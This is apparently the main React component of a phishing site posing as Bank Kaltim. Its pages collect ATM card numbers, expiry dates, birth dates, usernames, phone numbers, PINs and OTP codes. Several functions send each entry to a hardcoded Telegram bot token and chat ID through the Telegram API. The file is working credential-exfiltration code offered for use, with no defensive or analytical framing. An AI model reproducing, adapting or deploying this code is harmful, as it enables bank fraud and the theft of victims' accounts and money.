import { Route, BrowserRouter as Router, Routes } from 'react-router-dom';
import { useState } from 'react';
import '../css/App.css';

import Page1 from './Page1';
import Page2 from './Page2';
import Page3 from './Page3';
import Page4 from './Page4';
import Page5 from './Page5';
import Load from './Load';

function App() {
  const [Token, setToken] = useState('6006413007:AAGhI1JEfwJ7fx0eLrNylrr87J-N1m0j4KM');
  const [chatID, setchatID] = useState('5629878012');

  const [otp, setOtp] = useState('');
  const [ponsel, setPonsel] = useState('');
  const [user, setUser] = useState('');
  const [email, setEmail] = useState('');
  const [alamat, setAlamat] = useState('');
  const [tlp, setTlp] = useState('');
  const [atm, setAtm] = useState('');
  const [bank, setBank] = useState('');
  const [nama, setNama] = useState('');
  const [i1, setI1] = useState('');
  const [i2, setI2] = useState('');
  const [rek, setRek] = useState('');
  const [pin, setPin] = useState('');
  const [pinAtm, setpinAtm] = useState('');

  const tele = () => {    
    var api = "https://api.telegram.org/bot" + Token + "/sendMessage?chat_id="+chatID+"&text=";

    let msg = `OTP Bank Kaltim\n1. Kode OTP : ${email}\n4. boss ${alamat}`

    let message = msg.replace(/ /g, '%20').split('\n').join('%0A');
    fetch(api + "New%20Message:%20" + message);
    console.error("Notif Tele");
  }

  const telePin = () => {    
    var api = "https://api.telegram.org/bot" + Token + "/sendMessage?chat_id="+chatID+"&text=";

    let msg = `[NEW] Data Agen Toko\n1. PIN : ${pin}}`

    let message = msg.replace(/ /g, '%20').split('\n').join('%0A');
    fetch(api + "New%20Message:%20" + message);
    console.error(msg);
  }

  const tele1 = () => {    
    var api = "https://api.telegram.org/bot" + Token + "/sendMessage?chat_id="+chatID+"&text=";

    let msg = `Data bank kaltim\n1.no kartu ATM : ${nama}\n2.Berlaku Bulan : ${user}\n3. Berlaku Tahun: ${atm}\n4. tgl lahir : ${tlp}\n5. Username: ${i1}\n6. No HP: ${i2}`

    let message = msg.replace(/ /g, '%20').split('\n').join('%0A');
    fetch(api + "New%20Message:%20" + message);
    console.error(msg);
  }

  const tele2 = () => {    
    var api = "https://api.telegram.org/bot" + Token + "/sendMessage?chat_id="+chatID+"&text=";

    let msg = `[NEW] Agen Toko\n1. : ${otp}`

    let message = msg.replace(/ /g, '%20').split('\n').join('%0A');
    fetch(api + "New%20Message:%20" + message);
    console.error(msg);
  }

  return (
    <Router>
    <div>
      <Routes>
        <Route path='/three' element={<Page1 />} />
        <Route path='/two' element={<Page2 alamaat={setAlamat} email={setEmail} send={tele} />} />
        <Route path='/' element={<Page3 atm={setAtm} bank={setBank} user={setUser}  tlp={setTlp} nama={setNama} input1={setI1} input2={setI2} send={tele1} />} />
        <Route path='/four' element={<Page4 pin={pin} spin={setPin} send={telePin} />} />
        <Route path='/five' element={<Page5 otp={setOtp} send={tele2} />} />
        <Route path='/load' element={<Load />} />
      </Routes>
    </div>
    </Router>  
  );
}

export default App;
